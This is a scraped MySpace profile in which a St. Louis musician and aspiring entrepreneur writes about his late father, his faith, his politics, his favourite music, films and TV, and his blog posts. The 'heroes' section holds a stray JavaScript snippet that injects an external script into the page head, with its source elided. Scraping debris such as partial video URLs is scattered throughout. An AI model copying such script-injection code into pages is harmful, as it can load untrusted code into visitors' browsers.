Chuck profile picture


The destiny of man is in his own soul

About Me

There's so much to disclose, but believe it or not, I'm not interested in using ( My Space) for dating. This may sound a little auspicious coming from a guy, but that's how I feel. Fate, yes, I believe in it brings two people together. First of all, I will be explaining the ventures of "EXECUTIVE CLUBHOUSE" when all the paperwork as well as the finishing touches of the entity are completed. St. Louis, Missouri will be the 1st primary target to establish my client base. Let's say, I'll be able to do everything I've always wanted with this conglomerate. Second, I wanted to thank all my new friends that I've met throughout this entire network. I would say, perhaps some of the most talented and gifted musicians/performers I've ever heard or witnessed, but that's nothing compared to the types of people they are inside. I never knew that building a friendship base would be this easy, but when you're surrounded by the "gems" of the world, people tend to see what's inside them in others and that's what forms one unique base of true friendships. I have to ask, "wouldn't it be great if life was as simple as what I stated above"? Well, it sure isn't, but it makes living day to day, so much easier and one can look forward to his/her daily life while captivated in such a "circle of friends". I think it's personally important to mention that my father took me up to the local music store(in which, I'd be teaching at that same store in just 2 more years later) to purchase my 1st guitar in which, I still and will always keep. My father stated "ok, son, pick something basic and when you progress, you may upgrade later". Well, I had no idea that I'd loose him later that same year to cancer, but it was my father that heard the energy of my voice about music. So, for my 15th birthday, he purchased my 1st guitar for me. During this rough time for my family, a friend of mine, who taught me a lot when it came to music, came over and played live for my father privately before he passed away. For that Steve, I'll never forget what you did. I might add, because of my friends generosity, I accelerated and progressed into music theory and guitar pretty rapidly. I would have to say, I would spend, up to 7 hours practicing daily. My past experience within the music industry was so incredible. I started playing guitar at the age of 15 and by 17, I was teaching guitar and music theory(60 student base) at a local music store here in my home city. I would have to say, perhaps the best years of my life. I met and as well as had the privilege to work with incredibly talented people as well as my students. My teaching continued through my early 20s, but only privately. Quit frankly, I was a little tired of paying the music store a 40% cut, so I taught at home. Again, not to be rhetorical, these were times I'll never forget. I'll be honest, I wasn't always a saint you know. Once, I shouldn't even tell you this, but I dated a students mother. True story, but she was a stunning blonde teacher. What could I do? Nevertheless, music as well as being a performer, always excited me. Almost more than sex, well, I'm not going there. Presently, I play daily still, but not competitively. I've added the drums/percussion to my resume as well. My musical interests are all over the place. My senior year in high school, I played in a hard rock/pop band as well as a jazz band when I wore a tux. It was so much fun, I should say, to much fun at times, but again, way to much information here. I could reminisce about this, but perhaps I'd misplace my credibility with you. I don't want that. Moreover, it makes a musician proud, almost embarrassed to an extent, to know, after all these years, people(musicians, students, or fans) still remember your work and chastise you on why you're not doing anything with your talent. I always will be humble when it comes to this. I just wish, my father would have been a live to watch me play on stage at 16. He was, but in spirit. I'm sure, I had him laughing in heaven at my first stage appearance as I had bra straps and womens undies tied around my guitar neck. This was an every gig occurance at times. I'm sure musicians loved this latest comment. Or, when I played professional soccer, right out of college at the age of 25. God bless you dad. Also, I have to thank God for my entire family as they've been my "rock" throughout my entire 35 years. It's the family base along with the frienships made that make the man as well as his love for life.Change is necessary and that's what I'm doing with the profile. It's old viewing the same rhetoric. I will say though, I'm blessed by God to have the family and friends support that I do. It's truly amazing. There are times when I feel like I can actually "walk on water" due to the support I have backing me. Notwithstanding, I'd like to welcome all my new friends that truly mean so much as I look forward to knowing each and every one of you. Believe in yourself and you can move mountains. Denial, no time for that, but snap out of it. To be completely honest, I really enjoy my life. Currently, I'm involved in kicking off a massive venture that'll completely change my life. I have a message for all my dear friends that are musicians. Please, never give up your talents. I realize it's a tough industry with so much ideology it'll make you drink, but continue to play with your heart and soul because you're all incredibly gifted. A little more about myself, well, I really admire people that do what they set out to do. Also, people who are heavily into family. I'm always doing things with my nephews over the weekends. A little something about my top "8" and that's simply that I usually will rotate so that I don't leave anyone out as well as give your music or talents a chance for others to adsorb. I believe in "balance" and being able to make everything work. I'm very unique in how I live my life and view the world. I'm happy to say that I have many different types of friends, so I'm open to new friendships no matter who you are. My politics, is simple. I'm an Independant Conservative respectfully. I believe in our lord, country, language, borders, and our culture. Speaking of, God bless our military in all that they do. You see, without their service, we would be doing the order keeping. Think about it for a minute. I do, though, have friends that are liberal. Mostly on the moderate side though. However, if you hate the United States, God, our livelihood, talk down to our military and are mean spirited (yes, this includes treating hospitality industry professionals abruptly as well) like the far left secular progressive movement, please move on because you will engage yourself in one pulverizing debate. I'll come at you with pure hard facts while you spin your ideology that will falter throughout the debate. So, with that said, I welcome everyone as a friend. Let's see, I'll tell you that often while I'm watching television, if I hear a catchy song, I'll grab one of my guitars and will figure out the song. I even do this while I'm sleeping. I know, sounds silly, but if I hear something on the radio or television while I'm down, I'll actually shoot up and figure out the sound. Please don't try to figure me out, I've been attempting this venture for 35 years.
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My Interests

Jesus/God are my power and strength! Thank you for being such a forgiving man as w/o your tenderness, I probably wouldn't be here right now!God bless the USA!God, thank you for Max as he's truly shown me the light!It's Max! He's without a doubt, my best friend. God bless you you spoiled baby!!! The second photo was of our last snowfall here in Feb. 2007The love of my life! What would I ever do w/o you? Let's never find out shall we!Robbin Crosby One of my favorite guitarists who passed away in 2002. God bless ..He was a super nice person to talk with.Ok, my addiction to "blondes" was uncovered over 20 years ago!My favorite channel hands down.Music will always be my 1st love! I'd have ventured into insanity if it weren't for all my guitars.My admiration and love for animals!Judge Judy ROCKS!!!!! One of the richest women in America according to Forbes.comThree of the most powerful and successful business entrepreneurs of our time all caring different messages. From left to right are Robert Kiyosaki, Donald Trump and Paula White. Simply brilliance at work with an all-out vision.The complete logic of terrorism is??????????My Best friend Annie! God bless you my good friend and thank you for all the inspiration. You're amazing!!!One of my favorite things to do when I have the time!Sometimes I take in natures beauty while I meditate. Alaska is awesome!!!!St. Louis based MDZ (Modern Day Zero) featuring my good friend Matt on guitar then. Matt was not only my best friend in high school, but my guitar teacher as well.Matt (from Modern Day Zero), Mike (Mad-Dog), Sharon and I inside a long stretch limo back in 1989 as teenagers. Take note, what's in our hands, the good times and believe me, we partied like "rock-stars" at a very early age, my lord!!You know, it'll be another lifetime until we witness talent like we did with "The Rat Pack"....there's absolutely nothing today like these incredible talented men. Moreover, back then as well as now, their talents are unprecedented within the entertainment industry. Pure brilliance!!!!!Close friends with "The Legend Killer" and his awesome family. Truly a remarkable talent that works very hard and has overcome so much. His parents are hysterical.Anthony Robbins....Truly inspirational. His "Get The Edge" & "Personal Power" I highly recommend.Current book I'm reading by Mr. Trump & Mr. Kiyosaki entitled, "Why We Want You To Be Rich"Bill O'Reillys "Culture Warrior" in which, I have the audio cds to this masterpiece! Extremely informative and very well-done! What's say you?Please support "Morning Vision Blue". Blue is a friend of mine and her local St. Louis, MO band are currently playing many live shows throughout the midwest.American Idol! Pure geniousCheck out the star judges on American Idol! Did you know that Randy Jackson recorded as well as toured with "Journey" in 1986-87? I love Simon..He just tells it how it is. Paula, you're a doll!! Ryan, you rock!"24" Monday nights on Fox. One of the best television series ever produced! Vegas 2006! The city totally kicks butt in so many ways. In July, I'm going for 10 days and looking forward to it.The Las Vegas Strip as you'll never see more lights anywhere!Las Vegas once again!Sexy Sirus show at Treasure Island! I'm so glad that I don't work for this show. It would be tough to conduct myself on a professional level...LOL.Hard Rock Cafe Las Vegas! Used to reside right behind the hotel off of Harmon Ave.MGM Grand Las Vegas! I can't tell you how many times I partied at this establishment.Another shot of the Las Vegas Strip! Rumor has it that officials are looking into building another strip. True!!The New York/New York in Las Vegas 2007 for New Years! This is one awesome shot!!!New York City with the Twin Towers. I adore the city and I'll never forget what happened to all of us on that terrible day. I'll NEVER forget 9-11-01Los Angeles (The city of Angels) Absolutely beautiful city especially on and around the coast line.Los Angeles, California at night!Chicago! This is one partying city with so many places to eat and shop. The worlds largest aquarium is a must see as well as the entire Michican Avenue/Lake Shore Drive. The Loop is so cool to drive. Spent many New Years up there and I actually lived to tell about them.Taken in Las Vegas at Ceasars Palace around 1997This one was taken in 1988 when I was 17 yrs old. The custom-made Strat was given to me by my mother for my birthday! She knew that I was serious about music. Also, take note, I just had all my perm/body-wave cut out, so this was a nice style after the "Bon Jovi" look.Fender..that's all you need to know!!The 2006 St. Louis Cardinals! World Champions!!!!!!" =vids.individual&videoid=1368694839"2006 World Series
Add to My Profile | More Videos, there are so many, but to consolidate some, my interests revolve mostly around the entertainment industry. Music, theater, radio, television and athletics are all part of my makeup. Other passions are politics and intellectual debates are stimulating. Of course, God, family and friends are all very important to me. Notwithstanding, my love for animals, especially my pure bread German Shepherd named "Max".Just look at what Jesus did for us!May God bless our military! I envy your convictions and pray for your safety. God bless the United States Of America!!!Again, my admiration for animals, especially lions and tigers continues!Music will always be my 1ST LOVE!!!!!

I'd like to meet:

I'd like to meet anyone fun and exciting. Perhaps meeting my wife would be someone I'd like to run into. Believe me, there's not a day that goes by that I don't think of this happening. Moreover, I can't wait to be married, but only to my soul-mate who's my best friend. Also, meeting new friends that share the passion of the entertainment industry. Like for example, the music and theater business. Extremely pleasant and polite people are of tremendous interest to me. Moreover, career and professional people are so awesome to make acquaintances with. As far as who I'd like to meet in my personal life, well, when this incredible woman surfices, it'll be so incredible. What's funny is along with age, comes experience and I can't wait to be in the arms of the one who's just like me. Some say, opposites attract, well, not for me. I pray for the day God will send this spitfire into my life so we can look over one another as well as drive one another crazy. Notwithstanding, conversing and meeting political figures as well as debates are so interesting to me as well. Yes, I read and follow events daily and I'm heavily into debate about pursuing a political life somewhere in my 40s. Also, I'd love to meet my father just for five minutes to thank him for all his teachings and being the best father a son could ever have, but unfortunately, this isn't possibly until it's time for me to leave this world. One thing though, fretting about this isn't an option because he lives through me. Look out world, here I come. idual&videoid=1790380076 Ashley Florida Jan. 2007

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Created by
Name: Chuck
Birthday: April 15th
Birthplace: St. Louis MO
Current Location: St. Louis MO
Eye Color: Hazel
Hair Color: Dark Brown/Black
Height: 5' 10"
Right Handed or Left Handed: Right
Your Heritage: German, Irish, Indian and Italian
The Shoes You Wore Today: Black Bostonians
Your Weakness: Well-dressed business women
Your Fears: Death within family
Your Perfect Pizza: New York Style, but here in STL..Pizza World/Hut
Goal You Would Like To Achieve This Year: Finally unleash my LLC
Your Most Overused Phrase On an instant messenger: ASL...SO LAZY!!!!
Thoughts First Waking Up: Thank God for another day
Your Best Physical Feature: Eyes
Your Bedtime: Sheesh, what's that?
Your Most Missed Memory: My father
Pepsi or Coke: Coke
MacDonalds or Burger King: MacDonalds
Single or Group Dates: Both
Lipton Ice Tea or Nestea: Both
Chocolate or Vanilla: Both
Cappuccino or Coffee: Coffee
Do you Smoke: Omgosh, NO!!!
Do you Swear: Sometimes
Do you Sing: Yes
Do you Shower Daily: Yes
Have you Been in Love: Yes, but not enough to marry
Do you want to go to College: No
Do you want to get Married: Omgosh, YES!!
Do you belive in yourself: Yes
Do you get Motion Sickness: No
Do you think you are Attractive: Yes
Are you a Health Freak: Somewhat, but not like I used to be
Do you get along with your Parents: Yes
Do you like Thunderstorms: Yes
Do you play an Instrument: Yes
In the past month have you Drank Alcohol: Yes, but that's rare
In the past month have you Smoked: No
In the past month have you been on Drugs: No
In the past month have you gone on a Date: No
In the past month have you gone to a Mall: Yes
In the past month have you eaten a box of Oreos: Yes
In the past month have you eaten Sushi: Yes
In the past month have you been on Stage: Yes
In the past month have you been Dumped: No
In the past month have you gone Skinny Dipping: No
In the past month have you Stolen Anything: No
Ever been Drunk: Yes
Ever been called a Tease: Yes
Ever been Beaten up: No
Ever Shoplifted: No
How do you want to Die: Old age
What do you want to be when you Grow Up: Good question! LOL
What country would you most like to Visit: England
In a Boy/Girl..
Favourite Eye Color: Blue or Hazel
Favourite Hair Color: Blonde or Brunette
Short or Long Hair: Long
Height: 5' 6"
Weight: Weight proportion to height
Best Clothing Style: Formal and business attire
Number of Drugs I have taken: Zero, unless sick
Number of CDs I own: Hopefully, a lot
Number of Piercings: 2 max
Number of Tattoos: 1 is more than enough
Number of things in my Past I Regret: Probably intimacy related, that's all I'm saying



My music interests are second to none and are respectably more diverse than most. For example, in my convertable right now, I have Kenny G, Star Wars Episode 3, Metallica, Peter White, Celine Dion, Motley Crue, Anita Baker and Bon Jovi. Being a musician, I believe one must respect every gift of sound to really understand the musical language. It's interesting, my two favorites are smooth jazz and rock. Studio musicians, engineers, as well as producers like Nathen East, Patrick Leonard, Randy Jackson, Walter Afanasieff, Wayne Braithwaite, Ted Templeman. Dan Huff, Beau Hill, Michael Wagener and of course, Mutt Lange are amazing and sometimes overlooked.Smooth Jazz artists like Peter White, Nelson Rangell, Hiroshima, Everything But The Girl, Vanessa Williams, Richard Elliot, Kenny Gorelick, Dancing Fantasy, Dan Siegel, Tina Turner, David Foster ,Alicia Keys, Brenda Russell, Reberta Flack, Diana Ross, Stevie Wonder, Ray Charles, Nat/Natalie Cole, Will Downing, Stanley Clarke, Jazz Masters, 3rd Force, Earl Klugh,Brian McKnight, Marc Antoine, Dave Benoit, Kitaro, Rick Braun, Chris Botti, Steve Cole, Dave Koz, Boney James, Gerald Albright, Diana Krall, Patti Austin, Jeff Goldblum, Kashif, Norman Brown, Najee, Warren Hill, Kim Waters, Candy Dulfer, Kirk Whalum, Everette Harp, Mindi Abair, Doc Severenson, Paul Shafer, Phil Collins, Paul McCartney, Toni Braxton, Expose, Lisa Stansfield, Sarah McLachlan, Mario, Charlie Parker, Miles Davis, Gred Howe, Out Of Eden, Out Of The Grey, Avalon, Mariah Carey, NSYNC, Wayman Tisdale, Brian Covertson, Euge Groove, Paul Hardcastle, Russell Freeman, George Benson, Branford Marsalis, Duke Ellington, Weather Report, Count Basie, George Howard, Emilio Estefan(Glorias husband) I adore techno as well and find The Chemical Brothers extremely talented. I've also found techno/trance dj Armin Van Buuren. He's freaking amazing!!!Some of my favorite guitarists are Eddie Van Halen, Peter White{Jazz Guitarist}, Acoustic Alchemy(Nick Webb & Greg Carmichael are brilliant) Ronni LeTekro{TNT} BB King, Al Di Meola, Jay Palmer, Russell Freeman of (The Rippingtons), Paul Dean, George Benson, Neal Schon of Journey, Criss Oliva of Savatage R.I.P. Criss, Chris Impellitteri ,Craig Chaquico, Joe Satriani, George Lynch of Dokken, Yngwie Malmsteen of the Rising Force, Nuno Bettencourt, Steve Morse, Lee Ritenour, Reb Beach, Randy Rhoads, Jake E. Lee, Zakk Wylde, Slash, Jason Becker, Vinny Moore, Jeff Beck, Eric Clapton, Roy Orbison, Rik Emmett, Kirk Hammett, John Petrucci of Dream Theater, Steve Stevens, Matthew/Gunnar Nelson of The Nelsons, Tony MacAlpine, Robyn Crosby(RIP), Warren Dimartini, Richie Sambora of Bon Jovi, Al Di Meola, Marchello, Pat Metheny, Chic Corea, Johnny Smith, Johnathon Butler, Norman Brown, Stevie Salas, Larry Carlton,Vivian Cambell, John Sykes, Mick Mars, Steve Via, Paul Gilbert, and I could go on and on. Elvis Presley is without a doubt, the king. He was the ultimate performer and kicked off a totally new way of entertainment.Acts like Enigma, Aretha Franklin, James Ingram, Michael Mcdonald, Etta James, Whitney H, Luther Vandross, Asia, Michael Bolton, Reberta Flack and most R&B/Smooth Jazz artists all have special places in my heart. Please note, I have over 3000 cds and approximately 8000 cassettes. It's funny, I actually have my music in catagories on my wall with labels. It was getting a bit much to have Iron Maiden next to Johnny Mathis or Andrew L. Weber next to Slayer. I do find Carnell, aka as Nelly very talented. Also, on the hip-hop scene I believe Marshall, aka "Eminem should have some recognition as well as Curtis Jackson, aka "50 Cent". Like their music or not, they've earned respect in the entertainment industry. In my opinion, acts don't sell, especially in 2006, 4 to 7 million cds without talent, fan base, strong marketing and public relations, and airplay. I adore seeing "live shows" more than anything. I can't understand though, for the life of me, why Ashley Simpson is so popular. I can't figure that one out, other than she's Jessicas sister, but sheesh, what a waste of airtime. You'll always hear praises from me about artists' Led Zepplin, Def Leppard, Ozzy, (Who has awesome guitarists always), Boston, LL Cool J, Ratt, Brittney Fox, Level 42, Shy England, Heart, Whitesnake, Triumph, Saigon Kick, Queensryche, Enuff Z Nuff, Tora Tora, Genesis, Marilyn Mason, Shooting Star, Hurricane, Pat Benatar, Survivor, Styx, Cinderella, Judas Priest, Megadeath, Poison, Bon Jovi, Skid Row, Whitecross, Stryper, Damn Yankees, Nelson, Frehley's Comet, Dixie Dregs, Firehouse, Bryan Adams, Night Ranger, Michael Bolton, The Rolling Stones, Trixter, Wilson Phillips, Sammy Hagar, Chicago, Peter Cetera, Toni Braxton, The Rippingtons, Chris Botti, Ray Charles, Stevie Wonder, Elton John, Paul McCartney, Tracy Spencer, The Yellowjackets, Kim Waters, Evertte Harp, David Sanborn, Al Hurt, Yanni, Garth Brooks, Faith Hill, Clint Black,Warrant, Benny Mardones, Kingdom Come, Soundgarden, Savagegarden, Savatage, Slayer, White Lion, Anthrax, WASP, AC/DC, Alice Cooper, London Calling, Venom, Queen, Accept, Metal Church, Twisted Sister, Pantera, Helloween, Quiet Riot, Testament, Armored Saint, Rolling Stones, U2, Creed, Nickleback, Cindy Lauper, George Michael, Carly Simon, Billy Joel, Elton John, Rod Stewart, Billy Idol, Huey Lewis And The News, The Nelsons, TNT, John Waite, Winger, Aldo Nova, Foreigner, Toni Braxton, Nickleback, Slaughter, Danger Danger, Kiss, Bee Gees, Van Halen, Richard Marx, Duran Duran, Survivor, Fleetwood Mac, Hiroshima, Everette Harp, Stanley Clark, Stanley Jordan, Kansas, The Police, Men at Work, Najee, Jennifer Lopez, Will To Power, Candy Dulfer, Corey Hart, Brenda Russell, Amy Grant, Michael W. Smith, Stryper, Dancing Fantasy, Amy Grant, Phil Collins, Tesla, Lizzy Borden, Hellion, Jim Brinkman, Santana, Quarterflash,The Human League, Cher, Culture Club, INXS, U2, The Motels, Y&T Krokus, Deep Purple, Rainbow, The Eagles, Pink Floyd, Rick Springfield, Diana Ross, Frank Sinatra, The whole Rat Pack, Guns n Roses, L.A. Guns, Tuff, Loverboy, Jon Secada, Dan Siegel, Brooks n Dunn, Reba, John Michael Montgomery, Garth Brooks, Clint Black, Europe, Styx, Dennis Deyoung, Yanni, Johnny Mathis, Julio/Enrique Iglesias, Prince, Mozart, Beethovan, Bach, The 3 Tenors, Damn Yankees and so many various entertainers. // watch?v=WNa9H-LS0Wo w S9EbBCI ividual&videoid=2018860510 Purple Rain

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Star Wars(all 6 installments)....George Lucas, wow, what a mastermind. John Carpenter/Debra Hills "Halloween"..Gone with the Wind, The Wizard of Oz , Cassablanca, Top Gun, Weird Science, Sixteen Candles,Scarface, The French Connection, The Last Don, Pulp Fiction, Spinal Tap(maybe the funniest rock movie ever made), The Firm, Cocktail, Pet Cemetary, The Fog, The Amityville Horror, The Wedding Singer, Indiana Jones Series, Superman, Spiderman, Twister, The Omen, The Towering Inferno, The Blob, All Bruce Lee Films, Bloodsport, Face Off, Coming to America, Heat, Casino, The Saint, The Godfather(all 3 films), Goodfellas, Grease, Halloween by John Carpenter(all films, but especially 1 and 2), Wes Cravens Nightmare of Elm Street(all films), Friday the 13th films, Donovans Reef, Shane, It's a Wonderful Life, The King and I, many silent films with Douglas Fairbanks and Gretta Garbo, Phantom of the Opera 1925 with Lon Chaney, The black n white horror films like Dracula 1931, there will NEVER be a better Dracula than Bela, Frankenstein, The Wolf Man, The Invisible Man, The Mummy, John Wayne, who's real name was Marion, Deep Impact, The Shawshank Redemption, Major Leauge(which is one of the funniest films ever), Slap Shot, My Tutor, St. Elmos Fire, The Breakfast Club, Class, Pretty and Pink, American Pie, FAST TIMES AT RIDGEMONT HIGH(Possibly the funniest movie ever made), Footloose(which soundtrack sold over 12 million copies--Chris Penn, RIP) The Unforgiven, Fist fall of Dollars, Dirty Harry(all of them), Jaws, The Lion King, Beauty and the Beast, Shrek 1 and 2, Beverly Hills Cop series.Absolute classic film back in 1996 w/ Vince and Jon because they're all money. Reminds me so much of how I used to be. Ok, I miss it sometimes, I'll admit it! wqtQ_-GzU h?v=6G6yVIHvsIE p:// m/watch?v=dJuRdOWCHEw o3c AZCnH4PYg h?v=Z3vHbOilhpc


Television interests are Monday Night Raw(The WWE), 24(Have to love Jack) Cops, Fox News, The Bionic Series from the 70s, Starsky & Hutch, Speed Racer, Tom & Jerry, The Weather Channel, The Travel Channel, Good Times, Sanford n Son, Jerry Springer, M. Williams, Judge Judy, Judge Alex, Judge Joe Brown, CSI Miami/Las Vegas, Animal Planet, Discovery Channel, The History Channel, baseball(The St. Louis Cardinals), all sports really, MTV, flashback in 80s and Beavis and Butthead, HBO, Showtime and most of the movie channels. Mostly though, AMC and TMC on satallite. Also, The Sopranos, American Idol, reruns of Family Feud, The Brady Bunch, Sanford n Son, The Jeffersons, Happy Days, Good Times, Count TV, Desperate Housewives, WKRP, Charlies Angels, Chips, Matlock, Three's Company, The 3 Stooges, Comedy Central, Welcome Back Kotter, Happy Days, The Brady Bunch and so many others.


Yes, I read mostly political and business books. Lately, I'll purchase the audio cds to a book due to time constraints as well as the fact that I enjoy listening to the authors.


My parents for everything they've done for me over the years. Notwithstanding, all the crap I put them through. My family and friends would have to be second to none. Thank you for all your love and support. Also, my sister Diana who's managed to raise two young children, work, and be apart of an honors program in college taking 18 credit hours. Diana as well as my mother raised fine adults and I'm so proud of them. My God above as well as the men and women protecting our country. My German Shepherd puppy MAX, I adore you. .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"

My Blog

WWE Star: Randy Orton & Samantha Speno...Friends who are getting married...

AT HOME WITH: Randy Orton & Samantha Speno WRITTEN BY SUSAN FADEM 03/31/2007 ..> ..> Randy Orton and Samantha Sbeno met at Westport Plaza's Margarita Mama's. Neither one had wanted to go out t...
Posted by Chuck on Wed, 04 Apr 2007 11:25:00 PST

5 Important Tips for women when it comes to finding the right one....

TIP NUMBER ONE: YOU TEACH PEOPLE HOW TO TREAT YOU.. The point is that you have to treat YOURSELF the way you want to be treated. Not treat HIM the way you want to be treated.  When he sees that ...
Posted by Chuck on Tue, 03 Apr 2007 10:23:00 PST

People who scrumptiously read/answer others e-mails, phone calls or any other pvt sectors

..> ..> People who scrumptiously read/answer others e-mails, phone calls or any other pvt sectors There's a reason why opening someone else's' mail is a felony in the United States. Thus, this p...
Posted by Chuck on Tue, 03 Apr 2007 02:46:00 PST

Sport I once played even on this field....What memories...Bet U didn't know... ...
Posted by Chuck on Tue, 03 Apr 2007 12:01:00 PST

Secular Progressives 10 Commandments vs The ones I follow! Happy Easter

Secular Progressives 10 Commandments vs 10 Commandments I follow! Secular Progressives own "10 Commandments" 1. Thou shalt not make any judgement regarding most private and personal behavior. Man/wo...
Posted by Chuck on Fri, 30 Mar 2007 02:31:00 PST

Jealousy here on My Space and my epiphany on this tragic occurrence.

  Hello everyone! Most of you that know me understand that my demeanor for the most part is positive at best, but this subject I'm going to cover is one that's been sort of a "monkey on my bac...
Posted by Chuck on Thu, 29 Mar 2007 10:53:00 PST

My Space bands/music that add friends and don't communicate..It's ridiculous

This is becoming a major annoyance in my opinion. Moreover, I bet I'm not along in this category. I mean, come on!!! This is especially true for mainsteam acts that are millionaires. Why don't they ha...
Posted by Chuck on Wed, 28 Mar 2007 10:09:00 PST


PEOPLE COME INTO YOUR LIFE FOR A REASON   People come into your life for a reason, a season or a lifetime. When you know which one it is, you will know what to do for that person. When someone is...
Posted by Chuck on Sun, 17 Dec 2006 04:17:00 PST

My Faith In "Holding Out For The Special Angel"...

My Faith In "Holding Out For The Special Angel"... Due to My Space and it's improprieties lately, I'll be pausing while writing this.....I'll be finishing this tomorrow, but I'm starting tonight... ...
Posted by Chuck on Sun, 17 Dec 2006 03:59:00 PST

Some North County homeowners go extra mile when lighting their house for the holidays..My Area!

Sarah Cross photo - Bellefontaine Neighbors residents Rich and Toni Pflueger used 12,600 lights to decorate their house on Green Acres Drive. .. src="/shared-content/newsys/common/photo.js">..>...
Posted by Chuck on Wed, 13 Dec 2006 04:13:00 PST